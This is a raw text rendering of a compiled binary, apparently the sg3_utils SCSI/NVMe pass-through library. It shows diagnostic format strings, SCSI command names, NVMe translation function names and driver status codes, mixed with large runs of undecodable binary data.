        %s: din [0x%lx] not page aligned
       %s: expecting d_pg=0x%x from NVME_MI SES receive
       %s: error but no sense?? n=%d
  %s: immed bit, lba and num_lbs fields ignored
  %s: no translation to NVMe for SCSI %s command
 %s: command length of %d bytes is too short
    Replicated or unused set_scsi_pt... functions
  %s:  is_nvme=%d, is_sg=%d, is_bsg=%d
   %s: resid (%d) should never exceed requested len=%d
    &gt;&gt;&gt; msense(6) but resp[0]=%d so try msense(10) response processing
     &gt;&gt;&gt; msense(10) but resp[0]=%d and not msense(6) response so fix length
 &gt;&gt;&gt; msense(%d) but resp[0]=%d so switch response processing
    %s: unexpected resid=%d, page=0x%x, pcontrol=%d
        prevent argument should be 0, 1, 2 or 3
          info field: 0x%lx,  valid: %d, ili: %d
       %s: unknown pt_result_category=%d
      %s: buffer_offset value too large for 24 bits
  %s: param_len value too large for 24 bits
          Write buffer parameter list%s:
     %s: unknown service action 0x%x
        %s: returns SG_LIB_CAT_CONDITION_MET
   Bad starting field number: 0x%x
        DID_NEXUS_FAILURE (reservation conflict) 3.18 20210617 Host_status=0x%02x [%s]
 Driver_status=0x%02x [%s]
 nvme nvme%u /proc/devices fopen %s failed: %s
 Character %d %126s bsg found sg_bsg_major=%d
 found sg_nvme_char_major=%d
 Host_status=0x%02x  is invalid  Driver_status=0x%02x  [%s]  %s: enter, nvmsr=%u
 %02X NVMe char device
 NVMe block device, nsid=%lld
 %s: file descriptor is  bsg device
 open %s with flags=0x%x
 SG3_UTILS_LINUX_NANO sgv3 doesn&#039;t support bidi
 %s:  SCSI status:  plus...:  NVMe Admin command: %s
 
Data-out buffer (%u bytes):
 
Data-in buffer (%u bytes):
 NVMe NVM command: %s
 %s: RCAP%d, time_secs=%d
 %s: invalid file descriptors
 %s: time_secs=%d
 %s: start
 %s: pow_state=%u
 %s: fua=%d, time_secs=%d
 %s: mode se%s
 %s: bytchk=%d, time_secs=%d
 %s: ndob=%d, time_secs=%d
 %s: immed=%d, time_secs=%d
 count too big
 synchronize cache(10) read capacity(16) read capacity(10) , first 256 bytes mx_resp_len too big
 mode sense(6)     %s: response mode sense(10) mode select(6) %s: param_len too big
     %s parameter list
 mode select(10) log sense log select start stop unit prevent allow medium removal     %s: response
     %s parameter list:
     %s timeout: %d seconds
 Read defect(10) Format unit Reassign blocks Persistent reservation in Persistent reservation out     %s parameters:
 read long(10) read long(16) write long(10) write long(16) , first 4104 bytes     data_out buffer%s
 NULL cdb pointer
 cdb_len must be 12, 16 or 32
     %s cdb:
 %s: bad parameters
 %s: timeout
 %s: do_scsi_pt: errno=%d
       duration=%d ms
 %s: transport error: %s
 %s: os error: %s
 read buffer(10) write buffer     %s parameter list  (first 256 bytes)     Write buffer cdb: %s
 unmap read block limits Extended copy (LID1) LBA NUM_BLOCKS %s: LBA exceeds 2**32 in %s
 %s: do %s due to %s size
 set cd speed     %s cdb:  Bad rt value: %d
 Bad mx_resp_len: 0x%x
 get configuration     %s: response:
 Bad data_type value: %d
 Bad max_num_desc: 0x%x
 Bad type: 0x%x
 get performance set streaming DID_OK DID_NO_CONNECT DID_BUS_BUSY DID_TIME_OUT DID_BAD_TARGET DID_ABORT DID_PARITY DID_ERROR DID_RESET DID_BAD_INTR DID_PASSTHROUGH DID_SOFT_ERROR DID_IMM_RETRY DID_REQUEUE DID_TRANSPORT_DISRUPTED DID_TRANSPORT_FAILFAST DID_TARGET_FAILURE DID_NEXUS_FAILURE DID_ALLOC_FAILURE DID_MEDIUM_ERROR DID_TRANSPORT_MARGINAL DRIVER_OK DRIVER_BUSY DRIVER_SOFT DRIVER_MEDIA DRIVER_ERROR DRIVER_INVALID DRIVER_TIMEOUT DRIVER_HARD DRIVER_SENSE         @#��`&quot;��P&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��#��`&quot;���&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;��`&quot;���&quot;��|g���^���^��Jf���^���^���^���^���^���^���^���^���^���^���^���^���^���^���g���^���^���^���^���^���^���^���^��f��e���d���^���^���^���^���^���^���^���b���^���^��_b���^���a���^���^���^���^��0a���^���^���^���^���^���`���^���^���^���^���^���^���^���^���^���^���^��0`���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^��_���^���^���^���^��_���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^���^��_b���^���a���^���^���^���^��0a���^���`���^��0`���^���^���^���^���^���^���^���^���^���^���^���^���c���^���^��4c��Lg���a���a���f���a���a���f���f���a���a���a���a���a���a���a���a���a���a���e��qm��qm���m���m���m��qm���m����&lt;���$�$�p�(��� �h�\�����l�H� �����X�    mk_sense_asc_ascq               sntl_get_features       do_nvm_pt       sntl_inq        sntl_rluns      sntl_tur        sntl_req_sense  sntl_rread      sntl_write      sntl_senddiag   sntl_recvdiag        sntl_mode_ss    sntl_verify     sntl_write_same sntl_sync_cache sntl_rep_opcodes        sntl_rep_tmfs           sntl_start_stop sg_do_nvme_pt   do_nvm_pt_low   sntl_readcap    sntl_cache_identify             sntl_check_enclosure_override   sg_nvme_passthru_cmd            mk_sense_invalid_fld            mk_sense_from_nvme_status       do_scsi_pt      set_pt_file_handle              destruct_scsi_pt_obj            construct_scsi_pt_obj_with_fd   scsi_pt_open_flags              check_pt_file_handle            check_file_type sg_ll_pre_fetch_x               sg_ll_3party_copy_out           sg_ll_write_buffer_v2           sg_get_mode_page_controls        ��  �����                                                ;  �   �]��   @f��H  �n���6  po��`  �o��t  @p���  0q���   r���  �r���  pv���	  0z���	  �z���	  �z��
  �z�� 
  �z��4
  P{��H
  �{��l
  0|���
  �|���
  P~���
  �~��  `��,  ���T  ���  ���  0����  P����  ����  ����$  ��8   ���L   ����  0����  0����  �����  �����  ����   �����   ����  �����   ���  0���0   ���\  Ѝ��|   ����  ����  �   ���L  `���`  ����t   ����  �����  `���4   ���p  �����  ���  ����  @���,  P���@  `���T  p���h  ���  ��   �����   ��(  0��&lt;  ����  ���  ���    ��4  P��H  ���   ��  @�  ��&lt;  ��p   ��  p��  ��  ��P  �����  ���  P����  `���  p���  ����0  ����D  ����X  ����l  �����  ����  ��(  �&lt;  0���  `���  ����  ���  0��&lt;  p��d  ����  `
���   ��l  @���  `���  ����  ���   ���  ���d  ����  ���  `���  ����  p���  ���  ���4  ���p   ���  0���  @���  P���  ����  ���$  0 ��d  P ��|  @!���  �!���  �!���  �!��  �!��  �!��0  �!��D  0&quot;��x  P&quot;���  p&quot;���  �&quot;���  �&quot;���  �&quot;���  �&quot;���  �&quot;��  0#��  �#��,  �#��@   $��T  @$��h  �$��|  �$���  �$���  �$���  �$���   %���  %���  P&amp;��\   �&amp;��p   �&amp;���   �&amp;���   �&amp;���   �&#039;���    *��\!  P*��x!  �*���!  �*���!  ,��&quot;  p/��\&quot;  @3���&quot;  @4���&quot;  5��,#  05��@#  �8���#  P9���#  p;���#  0&lt;��@$  �&lt;��p$  �&lt;���$   =���$  @?���$  �?�� %  �?��%  �?��(%  P@��&lt;%  �@��P%  �@��d%  �B���%  �C��&lt;&amp;  @E��x&amp;  �I���&amp;  �J��&#039;  �N��T&#039;  pO��|&#039;  Q���&#039;  PR�� (  �U��p(  �s���(  Pv���)  �x���)  �z��*  �|��l*  �����*  ����+  ����8+  ���+  `���&lt;,  ����\,  ����,  @����,  ����-  ����H-  `����-  �����-  ����.   ���0.   ���x.  �����.  ���.  ��4/  �����/  �����/   ����/  ����80  �����0  Э���0   ����0   ���41  @���X1  ����|1  �����1  �����1  `���@2  ����2  `����2  0���03  p���\3  ����p3  ����3  ���4   ��`4  ����4  ��� 5  0��P5  ����5  ����5  ��@6  @��6  0��6  �L7   ��7  ���7  ��8  P�\8  �����8  ���8   ���L9  ���9  � ���9  P��8:  ����:             zR x�  $      �U��p   FJw� ?:*3$&quot;       D   �]��`             \   g��a           p   dg��`    A�E
JD
A    �   �g���    K��
B   �   th���    K��
A    �   (i���    E�I��
AA�   �   �i���   B�I�B �E(�D0�D8�D@�
8A0A(B BBBH�
8A0A(B BBBH�
8C0A(B BBBA�
8C0A(B BBBG  L   �  �l���   B�B�B �B(�D0�A8�G�2
8A0A(B BBBH      �  Lp��p    H R
F    �  �p��            �p��            �p��          0  �p��t           D   q��f    E�L�N
AA   h  Lq��b       $   |  �q��a    F�f
Da
GH   H   �  �q���   F�B�B �E(�A0�A8�D@�
8D0A(B BBBE    �  Ts��             �s���    E�T
GH
H $   (  ,t���    E�S
HK
EY  8   P  �t���    R�D�G �w
DBFH���H ���(   �  Hu���    N�G �
DAp�H �   �  v��M    F�^
Dd    �  Lv��          �  Xv��M    F�^
Dd      �v��             �v��          4  �v��       8   H  �v���    V�
KU
KU
KU
KUK�C�Y    �  pw��(          �  �w���          �  xx��Q   H w
A     �  �y��&quot;          �  �y���    �lhS  �   �  �z���   F�B�B �B(�A0�A8�D��
8I0H(B BBBN\
8A0A(B BBBJX
8I0D(B BBBET
8J0H(D BBBE   �  �{���       L   �  p|���   F�E�H �G(�D0��
(D BBBA{
(A BBBF     �  �}��f    E�Q�I
AA     �}��       (   ,  �}���    F�s
Gi
Gb
F      X  �~���    E�x
CdD   x  L��D   F�A�A ��
ABF�
ABFP
AEB     �  T����       D   �  0����    F�D�A �l
ABFp
ABEG
ABA   (     Ȃ��   e�
HN
A[
AY     H  ����L          \  ����2       (   p  $���`    F�D�D X
ABG  T   �  X���~   N�A�D �s(L0V(D G
ABJH���H ���N(M0H(F   8   �  �����    F�G�A �A(�G�^
(D ABBC8   0  $����    F�E�A �A(�G�M
(D ABBF@   l  �����    V�E�A �A(�G0d
(D ABBG@����     �  ���          �  ���/       L   �  ,���*   F�B�B �B(�A0�A8�G��
8A0A(B BBBJ      (	  ���	          &lt;	  ���	          P	  ���	       H   d	   ���h   F�B�B �B(�A0�A8�D`;
8A0A(B BBBIH   �	  $���    F�I�E �E(�A0�D8�DP�
8D0A(B BBBC�   �	  ؒ���   F�F�E �B(�A0�D8�G�?
8J0H(E DBBKa�D�W�A�a
8D0A(B BBBE
8M0A(B BBBE   �   �
  ���R   B�E�B �B(�D0�A8�J�L
8D0A(B BBBE
8Q0C(B BBBFl�U�E�E�Z�x�E�E�E�Y�      $  в��&#039;       �   8  ��A   B�E�B �B(�A0�D8�I�=
8D0A(B BBBE��W�[�B���W�a�A�{�R�r�F�U���S�h�A���E�T�A�	�V�W�B�    �  ���            ���            ���K          0  ���K       L   D   ���   F�B�B �B(�D0�A8�G��
8A0A(B BBBF   0   �  p��   F�A�A �DP�
 AABH8   �  L��   F�B�A �A(�D@�
(A ABBA 0     0��:   F�A�A �Dp�
 AABG0   8  &lt;��	   F�A�A �D@�
 AABG d   l  ��c   F�B�B �B(�A0�A8�G��
8D0A(B BBBG�
8D0A(B BBBG    �   ��c          �  |��#    HZ H      ���H   F�B�B �E(�D0�A8�GPx
8D0A(B BBBH H   L  ����    F�E�E �E(�D0�A8�DPs
8A0A(B BBBA    �  ���7    E�P
KM    �  ��f       4   �  x��   f�K�G �A(�� ABBF����      P�            L�          ,  H�          @  D�          T  @�          h  &lt;�	          |  8�	       �   �  4�   F�D�E �E(�A0�D8�J�	�
8A0A(B BBBF�	K�	c�	B�	C�	U�	Z�	A�	Q�	O�	Y�	A�	��	K�	a�	A�	     $  ��	       L   8  ��@   B�I�E �E(�A0�D8�J��
8D0A(B BBBA      �  ��)    HK U     �  ��*    HN S  L   �  ��_   B�K�B �B(�A0�A8�G�\
8D0A(B BBBE   $     ��7    HS F(B0B8B@O  $   8  ��8    HP F(D0B8E@N  $   `  �9    HQ F(D0B8E@N  l   �  ��   F�E�E �D(�A0�D@iHLPIXD`BhBpI@�
0D(A BBBD]HKPIXB`BhBpI@  l   �  \�   F�E�E �D(�A0�D@iHLPKXE`BhBpI@�
0D(A BBBI]HKPLXB`BhBpI@  L   h  ��   B�F�E �E(�D0�D8�J�
8D0A(B BBBH      �  |�          �  ��    F�E      �  ��          �  ��       L     ���   B�I�I �E(�D0�C8�G�0
8D0A(B BBBD   $   `  D���&amp;    F�DB VAB      �  L���%    HB Z     �  `���N   DP
A   �  ����u    D0D
H    �  �����    D`N
F    �  l���u    D0D
H      ����    D0Y
C 8   0  T���   H]
KiL YAI
HAN TF      l  (���q          �  ����          �  ����          �  ����          �  ����#       L   �  ����e   F�H�B �E(�A0�C8�I��
8D0A(B BBBE   &lt;      ���?   F�J�G �A(�J�=
(D ABBH      `  ���    HV L   x  ����    O�B�B �B(�A0�A8�GP�8A0A(B BBBD������    �  l��L          �  ���          �  ���            ���            ���          ,  ���	       0   @  ���N    E�G�F T
AAH[AA    t  ���          �  ���          �  ���          �  ���          �  ���	          �  ���%          �  ���             ���2            ��C          (  L��          &lt;  X��X          P  ���3          d  ���3          x  ���          �  ���	          �  ���&quot;          �  ��          �  ��          �  ��       d   �  ��2   F�B�B �D(�A0�v8M@U8A0L
(D BBBB]8C@^8A0R
(A BBBH     X  ���N          l  (��          �  $��          �   ��       H   �  ���    F�B�B �B(�D0�A8�D`k
8D0A(B BBBC `   �  ���#   F�B�I �B(�A0�A8�G��
8A0A(B BBBEH8M0A(B BBB    X  ���E    J�X�     t  ���J    E�b
IU    �   	��E    G�y   X   �  4	��   B�A�A �Q
ABHQ
ABDe
ABHM
ABAAHK H     �	��U   F�E�B �B(�A0�A8�DPD
8D0A(B BBBJ H   X  ���   B�B�E �E(�D0�D8�GPp
8A0A(B BBBI  8   �  ����    E�C�I�C�A�V�A�~
AADD   �  T���    M�E�D �h
BBFF
KBEZ
BBB      (  ���       H   &lt;  ����   F�B�D �C(�J�k
(A ABBFI�K�[�A�4   �  \��Q    F�E�D �A(�D0s(D ABB 4   �  ���   B�G�C �S�!
 AABD   @   �  l���    B�A�C �x
ABG\
ABI{AE   ,   &lt;  ����    F�J�A �i
BBB      l  h��          �  d��       H   �  `��:   F�G�H �K(�A0�A8�DP�
8D0A(B BBBD    �  T��3    HR X     �  x��            ���1          $  ���k          8  ��&quot;          L  (��       x   `  $���   B�E�B �E(�A0�A8�D`3
8Q0C(P BBBOY
8A0A(B BBBEl
8Q0A(B BBBEX   �  ����    B�B�A �C(�F0u
(A ABBGH
(Q ABBJD(L HDI8   8  &lt;���   B�B�A �C(�G@�
(A ABBJ L   t  ���]   B�E�E �E(�D0�D8�I��
8D0A(B BBBB   8   �  �&quot;���    B�H�D �C(�F��
(A ABBGL      �#��   B�B�E �E(�D0�C8�J�
8D0A(B BBBE   $   P  d&#039;���    D`phBpPhA`T
A @   x  �&#039;���   F�D�D �Fp�
 DABA�xG�IxAp   \   �  H)��&gt;   B�E�D �D(�D��
(D ABBDT
(D CBBIy
(F ABBEL      (*��(   B�E�B �E(�D0�D8�G��
8D0A(B BBBG   |   l   -��m   F�B�B �B(�D0�A8�G��
8D0A(B BBBG�
8J0D(B BBBE&#039;	
8F0A(B BBBE�   �   �J��Y   F�E�B �B(�D0�D8�F@�
8A0A(B BBBI{
8D0A(B BBBHj
8A0A(B BBBL�8J0F(B BBB  D   �!  �L��&gt;   F�F�B �D(�A0�G�c
0D(A BBBH   L   �!  �N��&quot;   F�F�B �E(�D0�A8�I�?
8D0A(B BBBC   L   &quot;  �P��   F�F�B �E(�D0�A8�I�1
8D0A(B BBBA   L   h&quot;  lR���   F�L�G �B(�A0�A8�G��
8D0A(B BBBE   L   �&quot;  �U���   F�L�K �E(�A0�A8�G��
8C0A(B BBBG   (   #  lY��1    HLF B(B0E8D@I   �   4#  �Y��   F�H�B �B(�A0�C8�I��
8D0A(B BBBGF�R�B�B�X��B�F�B�B�B�R���B�F�B�E�B�R�8�R�B�E�R�  L   �#  �^��r   F�I�D �B(�A0�A8�G�[
8D0A(B BBBJ      8$  a��/    HUB O   L   X$  ,a��r   F�I�D �B(�A0�A8�G�c
8D0A(B BBBB      �$  \c��/    HUB O   L   �$  lc��;   F�H�I �B(�A0�A8�G�[
8C0A(B BBBG   (   %  \f��6    HL F(B0B8E@DHEPIL   D%  pf���   F�I�B �B(�A0�A8�G��
8D0A(B BBBG   L   �%  �h��   B�F�B �E(�A0�D8�G�c
8D0A(B BBBE       �%  �k��&gt;    HTF F(B0S     &amp;  �k��?    HUF F(B0S D   ,&amp;  �k���   F�I�B �A(�A0�G�&quot;
0D(A BBBI   L   t&amp;  �m���   F�P�B �E(�D0�A8�I�Q
8D0A(B BBBG      �&amp;  �o��     HB U  L   �&amp;  �o���   F�J�K �B(�D0�D8�G��
8D0A(B BBBG   L   0&#039;  �r���   F�F�B �E(�D0�C8�J�H
8D0A(B BBBG      �&#039;  u��       L   �&#039;  u��B   F�M�E �E(�D0�A8�J�
8D0A(B BBBI   L   �&#039;  w���   F�I�B �E(�D0�A8�I�`
8D0A(B BBBG   L   4(  �y���   F�I�G �B(�A0�D8�G��
8D0A(B BBBF   (   �(  �|��F    HVF E(D0E8B@Q   ,   �(  }��E    F�UF E(D0E8B@QB  L   �(  4}���   B�I�E �E(�A0�D8�G��
8D0A(B BBBB       0)  Ā��8    HQF D(B0R     T)  ��5    HTB K(B0I     x)  ����7    HPF D(B0R L   �)  ����   F�I�B �E(�D0�D8�G�
8D0A(B BBBG   L   �)  ȃ���   F�M�B �E(�D0�C8�J�9
8D0A(B BBBG   L   &lt;*  ����   F�M�B �G(�F0�C8�J�=
8D0A(B BBBG   L   �*  x���B   F�O�E �E(�D0�A8�J�
8D0A(B BBBF   L   �*  x����   F�J�D �B(�A0�C8�G��
8D0A(B BBBF   (   ,+  ����7    HOF E(D0E8B@I      X+  ���       L   l+  ���R   F�F�B �B(�D0�D8�I�*
8D0A(B BBBH   L   �+  (����   F�F�B �E(�D0�C8�J�P
8D0A(B BBBG   L   ,  ����Z   F�H�B �E(�D0�D8�G�C
8D0A(B BBBD   L   \,  �����   F�F�B �E(�D0�D8�G��
8D0A(B BBBE   L   �,  8����   F�F�B �E(�D0�D8�G��
8D0A(B BBBE   L   �,  ؚ��M   F�H�B �B(�D0�C8�G�s
8D0A(B BBBH   L   L-  ؝��H   F�I�F �B(�D0�C8�G�t
8D0A(B BBBJ   L   �-  ؠ��2   F�L�E �I(�A0�E8�G�Q
8D0A(B BBBE   L   �-  ȣ��J   F�L�H �I(�A0�C8�G�a
8D0A(B BBBD   H   &lt;.  Ȧ��&#039;   F�F�B �B(�A0�A8�G��
8D0A(B BBBE   �.  8��	    �������L   �.  �����   F�M�B �E(�D0�D8�G�l
8D0A(B BBBF   L   �.  ,����   F�P�B �E(�D0�D8�G�h
8D0A(B BBBG   L   H/  ����
   F�H�B �B(�A0�A8�G��
8D0A(B BBBH   L   �/  |���a   F�H�B �E(�D0�D8�G�a
8D0A(B BBBF      �/  ����)    HIB U   L   0  �����   F�M�E �B(�D0�C8�J�
8D0A(B BBBE   L   X0  ��R   F�F�B �J(�D0�C8�N�a
8D0A(B BBBE   L   �0  ����)   F�M�E �E(�D0�A8�J�%
8D0A(B BBBB   L   �0  ܾ��9   F�F�E �J(�D0�D8�G�z
8D0A(B BBBG   L   H1  ����   F�F�B �E(�A0�D8�G�i
8D0A(B BBBK   H   �1  &lt;��    F�P�I �B(�A0�A8�G��
8D0A(B BBBCL   �1  ���m   F�B�B �B(�A0�A8�D�6
8D0A(B BBBK   L   42  ��f   F�B�B �B(�A0�A8�D�;
8D0A(B BBBF   H   �2  0��P   F�I�B �B(�D0�A8�G��
8D0A(B BBBE                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            �     p     ��                             )�     �     1�     �     0                             ��     ��     ��     �     �     �     -�     @�     \�     �     m�     }�     ��     ��     ��     ��     ��     ��          ��     ��     	�     �     �     �     +�     :�     I�     X�     g�     v�     }�     ��     ��     ��     ��     9�     @�     O�     \�     i�     x�     ��     ��     ��     ��     ��     ��     ͉     ۉ     �     ��     �     )�     ;�     M�     ^�                             u�     �     ��     ��     ��     ��     ��     ϊ     ۊ                             9�     @�     O�     \�     i�     x�     ��     ��     ��     ��     ��     ��     ͉     ۉ     �     ��     �     X�     ;�     M�     ^�            -             7              �             `�            p�                          x�                   ���o    �             )             @      
       �                           ��            �                           ��             �B             �      	                             ���o           ���o    B      ���o           �o    �?      ���o    $                                                                                      ��                     0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      ��      ��      ��       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      ��      ��      ��       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      ��      ��      ��       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      ��      ��      ��       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      ��      ��      ��       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      �      �      �       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      �      �      �       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      �      �      �       �      �       �      0�      @�      P�      `�      p�      ��                                                                                                                                                                                                                                                                      ��                              unknown errno:                                                        $   @D @   	 , 1!     1	&#039;    !����                                              	   
                                                                          9�           D�           P�           Z�           n�     ��                     ��           ��           ��           ��     	      ��     ��                      `            ��            �            �            �                 
       ɭ            @            �            �            �                        (     ��                     ��            	�            �            )�     ��                                     ;�           Q�           n�           x�     ��                                      ��            ��            ��            ��            ɮ     ��                      `            ��            �     
       ޮ            ��            �            �     ��                      �            8�            X            �            P�            d�            v�            ��           ��     ��                      ǯ            ۯ            �            ��           
�            $�     ��                                      9�            B�            J�            R�            R�            Z�            �            l�            ~�     ��                      ��            ��            ��            ư     ��                                     װ            �            ��            �            
�            �             �           Z�           �     ��                     4�            K�            ]�            k�            ~�            ��            ��            ��            ñ            ߱            ��            �     ��                                    �     �       -�     ��                                     E�     ��                                 @           ^�           y�           `           ��           �            ��           �     
       ��            ز            �            ��            �            �           �           	           8	            `	     ��                     �	            �	           +�           �	           C�           �	             
           \�           j�           ��     	      @
     
       ��            ��            h
            �
            ͳ            ݳ            �            �
           �
                      �	            8     ��                     �            �             �            +�            7�            L�            X�            h�     	       }�     
       ��            ��            ��            ��            ��            ˴            ܴ            �            �            �     �      &#039;�     �      &lt;�     �      M�     �      Z�     �      e�     �      p�     �      |�     �      ��     
�      ��     �      ��     �      ��     �      е     �      �     �      ��     �      �     �      )�     �      A�     �      W�     �      e�     �      z�     �      ��     �      ��     ��      X     ��      ��     ��      ʶ     ��      ٶ     ��      �     ��      �     ��      �     ��      �     ��      �     ��      ,�     ��      :�     ��      I�     ��      b�     ��      {�     ��      ��     ��      ��     ��      ·     ��      ܷ     ��      ��     ��      �     ��      �     ��      5�     ��      N�     ��      f�     ��      x�     ��      ��     ��      ��     ��      ¸     ��      �     |�      �     }�      x     ~�      �     �      �     ��              I�                     W�           m�           ��           ��           ��           h           Ź           Թ           �     	      �     
      �           �           �                       @           �           7�           S�           h           o�           ��           ��           ��           ��           �           Ѻ           �           �        
   �           �           �                       ,�     !      I�     &quot;      ]�     �      w�     �      ��     �      ��     �      ��     �      û           ֻ          �          �          �          8�          8          I�          _�          v�     	     ��     
     ��          h          ��          �          Ƽ          �          �                    8          p          ݼ          �          �          �           �          �          0�          �          G�          _�          �          |�                !     @     &quot;     ��     #     h     $     ��     %     ӽ     �     �     �     �     �     �     �     ��     �     �     �     �     �     �     �           �     &lt;�     �     L�     �     (     �                 ����Z�           i�           w�           ��           ��           ��          ľ          ־                                             �            �            ��            ��            �            �     	       (�            ;�            P�            c�            w�     ��                      ��            ��            ÿ            п            �            �            �     	       �     
       $�            1�            L�            a�            q�            ��            ��            ��            ��            �            �            ��            �     |       �            )�     �       ;�     �       F�     �       T�     �       e�     �       n�     ��                                      }�            ��           ��            ��            ��           ��           �            �            �           �            �           
�     
       �     
      �     
      ��            &quot;�           *�           7�            F�            V�           i�            |�            ��            ��            ��            ��            ��           ��            ��           ��            ��            ��            �            �           $�           $�           0�            ;�            V�            f�     #       ��     $       ��     %       ��     %      ��     (       ��     )       ��     *       ��     +       ��     +      ��     +      �     ,       �     -       �     .       2�     /       G�     0       R�     1       g�     2       }�     3       ��     4       ��     4      ��     5       ��     6       ��     7       ��     7      P     8       ��     8      �     9       �     :       !�     ;       1�     &lt;       &gt;�     =       N�     &gt;       [�     ?       i�     @       x�     A       ��     B       ��     B      ��     C      ��     D       ��     E      ��     F      ��     G      ��     H       e�     J      	�     K      &#039;�     L       4�     M       ?�     N       I�     P       X�     Q       d�     Q      p�     R       ��     R      ��     S       ��     T       ��     U       ��     V       ��     V      ��     W       ��     W      	�     X       �     Z       *�     [       9�     \       M�     ]       b�     ^       q�     _       ��     ~       ��     �       ��     �      ��     �       ��     �      ��     �       ��     �       �     �       �     �       0�     �       E�     �       W�     �       j�     �       s�     �       ��     �       ��     �       ��     �       ��     �       ��     �       ��     �       ��     �       ��     �      ��     �       �     �      �     �       )�     �      8�     �      B�     �      J�     �       Q�     �       b�     �       r�     �       ��     �       ��     �       ��     �       ��     �       ��     �      ��     �       ��     �       	�     �      �     �       !�     �      1�     �       &lt;�     �      H�     �       W�     �      g�     �       z�     �      ��     �       ��     �       ��     �       ��     �       ��     �       ��     �      ��     �      ��     �       �     �       #�     �       .�     �       C�     �      x     �       Y�     �       m�     �       |�     �       ��     �      �     �       ��     �      ��     �       ��     �       ��     �       ��     �       �     �      �     �       �     �      0�     �       =�     �       F�     �      P�     �       a�     �      o�     �       w�     �      ��     ��                                      ��     ��            ��     �            ��     ��            ��     �            �                 �     ��            !�     @     	       h     .�     
       I�     ��            V�     �            f�     ��            q�                    �                    �                    |�                 ��     ��            w�                    ��     ��            ��     ��            ��     ��            ��     ��            ��     ��            ��     ��            ��     8             	�     p     !       �             &quot;       *�     ?�     #       U�     e�     $       ��             (       �             )       �             /       �             0                    2       ��     ��     a       ��     ��     b       ��     @     c       	�     h     d       �             e       6�             f       �             g       Q�             h       a�             i       p�             j       �             k       �             l                    m       ��             n       0             o       `             p       �             q       �             r                    s       8             t       `             u       �             v       �             w       �             x                    ~       8                    p             �       �     ��     �       �     ��     ��                                              @     h     �     �     ��     ��     �          H     ��     ��     ��     ��     ��     ��     ��     :�     �     �     �     &#039;�     ?�     F�     N�     d�     s�     ��     ��     ��     ��     h     �     ��     ��     �     �     7�     P�     U�     Z�     _�     d�     i�     n�     s�     x�     }�     ��             �            ��            �            ��            �            ��            ��                         H            ��            p            �            �            m�            �            -�            I�            f�            �            ��                         H            h             �      !      �      &quot;      ��            ��            ��            ��           �           �            �                       P           �           �           �                       X           �     	      �     
      �           (           h           �           �                      P           �           �           �                       @            p            �            �             !           @!           p!           �!           �!            &quot;            X&quot;     !      �&quot;     &quot;      �&quot;     #      �&quot;     $      ,�     %       #            H#            E�            x#            �#           �#           �#           $           a�     	       y�     	      ��     	      ��     	      ��     	      ��     	      P$     
       ��            ��           x$           ��           �$           �$           %           @%           p%           �     	      �%     
      �%           &amp;           @&amp;           x&amp;           �&amp;           �&amp;           &#039;           H&#039;           x&#039;           �&#039;           �&#039;            8�           (           @(           h(           �(           �(           D�           [�           y�     	      �(     
      )           ��           0)           `)           ��           ��           �)           �)           �)            *           ��           P*           x*           �*           �*            ��           �           1�           �*            K�           +           @+           p+           �+           �+            �           _�           v�           ��            ,           ��           ��           ��           ��     	      	�     
      �           0,           `,           )�           �,           B�           _�           �,           y�           �,           -           ��            P-            x-            ��           ��           ��           ��           �           �-           �-           &#039;�            @�           Y�            .            0.           P.           x.           �.           �.            �.           v�           (/           X/           �/           �/           �/           0           P0     	      �0            �0           �0           1           ��           ��           @1           h1           �1           ��            ��           ��           �1           �1            �            2            �           &quot;�           @�            (2           P2            x2            \�             �2            �2            �2            3            @3            p3            �3            �3            4      	      04      
      X4            �4            �4            �4            y�             5     !        5     !      ��     !      ��     !      H5     !      ��     !      ��     !      ��     !      �     !      /�     !	      H�     &quot;       p5     #       0     #      `     #      �     #      �5     #           #      8     #      `     #      �     #      �     #	      �     #
           $       c�     $      x�     $      �5     $       6     $      ��     $      ��     $      ��     $      ��     $      ��     $	       �     %       �     &amp;       X6     &amp;      /�     &amp;      G�     &amp;      x6     &amp;      �6     &amp;      _�     &amp;      u�     &amp;      �6     &amp;      ��     &amp;	      �6     &amp;
      ��     &amp;      ��     &amp;      (7     &amp;      `7     &amp;      �7     &amp;      �7     &amp;      �7     &amp;      8     &amp;      08     &amp;      X8     &amp;      �8     &amp;      �8     &amp;      ��     &#039;       ��     &#039;      �     &#039;      �8     &#039;      %�     &#039;      &gt;�     &#039;      W�     &#039;      o�     &#039;      �8     &#039;      ��     (        9     (      X9     (      ��     (      �9     )       �9     )      ��     )      ��     )      �9     )      ��     )      :     )      8:     )      ��     *       �     *      $�     *      &lt;�     *      S�     *      j�     *      ��     *      X:     *      x:     *      ��     *	      ��     *      �:     *      �:     *      ��     *       ;     *      8;     *      x;     *
      �;     *      �;     *      �;     *       &lt;     *      H&lt;     +       p&lt;     ,       �     ,      ��     ,      �&lt;     ,      �&lt;     ,      ��     ,       =     ,      �     ,      *�     ,      ?�     ,	       =     ,
      H=     ,      ]�     ,      x=     ,      �=     ,      j�     ,      z�     ,      ��     ,      �=     ,      ��     ,      �=     -       &gt;     .       8&gt;     .      X&gt;     .      �&gt;     .      �&gt;     /       �&gt;     /      ?     /           /      8?     0       ��     0      h?     0      �?     0      ��     0      �?     0      �?     0      @     0      ��     0      H@     0	      x@     0
